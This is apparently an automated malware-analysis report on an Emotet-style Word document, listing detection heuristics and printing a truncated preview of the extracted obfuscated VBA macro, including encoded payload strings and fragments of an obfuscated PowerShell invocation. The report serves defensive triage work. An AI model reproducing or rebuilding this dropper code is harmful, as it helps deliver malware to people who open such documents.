MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro that uses CreateObject to likely download and execute a second-stage payload. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further confirms its malicious nature. The VBA code is heavily obfuscated, but the presence of AutoOpen and CreateObject strongly suggests a downloader or dropper functionality.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43480 bytes |
SHA-256: bce9897f832f00fd017291b0aff090d9d3463349935ac9a329e7652b44cf7d3b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 25 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "fiKSLDDp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zRnQiChXzkX"
Function WAzbtrwnkjtBJO()
On Error Resume Next
For Each tjPpd In bUTIV
iSnjiF = 62230 - IAdpiK
For Each HQXhJ In oDwSv
YSoJqK = djOMi
Next
Next
jpAEouc = WRrdS("E2%aqmADQAZgBkAGQAYgAwAGMAOQBlAGIAOQA1AGUAMwA0AGUAYQBkAGEANwBiAGEAMwBlAGUAYQA5q8", 6, 73)
For Each ONNsD In LSKTE
aMjtOq = 26152 - TINTrm
For Each MhjsEs In uBaLt
kTNwkN = wljSX
Next
Next
For Each XSTJs In TMAUjz
cOjbQW = 74464 - jNsVRq
For Each jBcfW In GVYCs
EhNDI = LRmvD
Next
Next
uzCcfpl = WRrdS("jIJRFAGUAYgA5ADQAMgA2ADkAOQBlADcAOQAyAGYAOQA1ADYAOAAyADUAOQAwAGEAYgBmADMAOAAzAGMANgBhADUANgAwAGIAMQA0AGIANgAwAGQAMQBmADUAOQAzAGYAMQBmADMAYQA5ADAAZgA2AGUAYQAzADUANAA2ADgANQBkADYAYgA0AGQANAA5AGUAMgA3ADEARAqo", 6, 196)
For Each PGjnE In obHJfw
BdnVtK = 47607 - KiCWJ
For Each FFZWlw In QQWSQ
NRDuBO = HmXwt
Next
Next
For Each YUbAHE In LljstN
tbjNc = 2334 - OIJsYv
For Each IPwPi In zEfsHU
ULDnPj = XLWwQ
Next
Next
hlFVACqz = WRrdS("H03mADcAMAA2ADkANQA4AGYAMQBhADkANgA0AGEAYQBlAGUANQAwADMANgA5ADUANABmADYAYwBiADIANAA4AGUANwBjAGIAMgA3AGIAZgAxADAAMAAxADcAMgBkAGf8h", 4, 123)
For Each EKMSIj In UCWjd
cJowq = 10789 - PaDFV
For Each oqpzsA In DjnsNj
LRSoT = DHviP
Next
Next
For Each pLSCEE In vECfd
WVCoA = 57436 - jpPdw
For Each UPqtJ In bSiaNV
HIYnS = isBCT
Next
Next
jRriscoln = WRrdS("b.NMAAzADcANgAzADIAZgA1ADEANgA4AGUAZABiADcANQBlAGMAMAAwAGMAMgBiAGQANgAwADgAOQAzADAAYwBjADAAMwAzADUAOABjADUANwBjAGQAZQAzAGUAMABlAGQANQA3AGMAZQAzAGQAOQA0ADIAZgBlADMANQBjADQAYgBlADYAMABkADEANABmADAAcDi", 4, 192)
For Each ZLwJAv In FqjtFK
pBDnup = 35350 - WNKBzW
For Each VTNWQ In icJhiY
NYOSd = RcpNH
Next
Next
For Each iXkLZp In RHoGwn
zPiwIz = 11917 - HFsfB
For Each HtwNjV In kGBiH
TwlTO = HMKLo
Next
Next
pnwCVjC = WRrdS("Sp@EAAYwA3ADgAZQAxADkAZAA3AGUAZQBmADAAZgA4AGQAMwJlf", 5, 44)
For Each YbdPiS In oqKOst
RUMId = 32079 - vmGWl
For Each WtmwhI In LukVb
oSLJjt = zrnzCi
Next
Next
For Each LdhTS In kJDfZ
qRptN = 22728 - lWjpc
For Each LBZCf In XnizPd
wWYjkl = XIhjYJ
Next
Next
bwYZOTKB = WRrdS("aApUreSTrInG -K 25,13,230,59,145,218,62,251,194,208,12,55,231,211,115,237,126,14,147,94,171,140,209,12,80,6,194,249,24,42,99,59) ))4RK1", 4, 128)
For Each wOpcn In zHJKH
mCWHT = 50305 - jNfMn
For Each EjwCUt In VqaZtV
ZjrMOc = wrAAN
Next
Next
For Each XFGnWj In AMaDcs
rfEPi = 22079 - zAPaW
For Each qSqBHz In PJBiHj
CiRZB = mqzDu
Next
Next
bMnjli = WRrdS("XH & ( $SHeLLid[1]+$ShellId[13]+'x') (( [runTIME.iNteRopljzE", 3, 54)
For Each GGXFr In AzEiV
viPAh = 57740 - HzHQV
For Each qYHzAT In GurWrE
RHjzU = rdWzm
Next
Next
For Each TuNSuK In mhLqkS
TBjNwm = 65056 - BlzEUr
For Each qknBZI In sMkqrz
iDFLE = jLwVm
Next
Next
LnJMrkPoZli = WRrdS("CkiZQBzAEYAagBpAGwASgBRAE0AeQA4AEEAPQA9AHwANAA0ADUAOQBlADUANAA3ADcAOQA3AGMAMgAzAGUAOAA2AGUAZQnHlsN", 4, 90)
For Each ktbTp In mIqbDj
afITcF = 90852 - SWittQ
For Each ufmRP In YvRtv
EqaDz = Sdnar
Next
Next
For Each iizOd In VUsLi
XbpXhf = 43500 - RdmPj
For Each odGXds In JFhAd
wojcct = wzuYd
Next
Next
zbAVGH = WRrdS(".OfHjMAAzAGYAYgBlAGYAOQAzADYAYQBhADAAMAA3ADQANwAyADkAMgAwAGIAOQA5ADgANQA3ADYAZgA5ADcAYwAxADkANQAzADYAZAA1AGUAOAAzADgAMABmADAAZgAxADYANwAxADYAZAAyADMAMAAyAGYAZgAJi", 6, 155)
For Each oEoFr In ilRrOV
pTOWIW = 8476 - aZlAKV
For Each tqiiu I
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.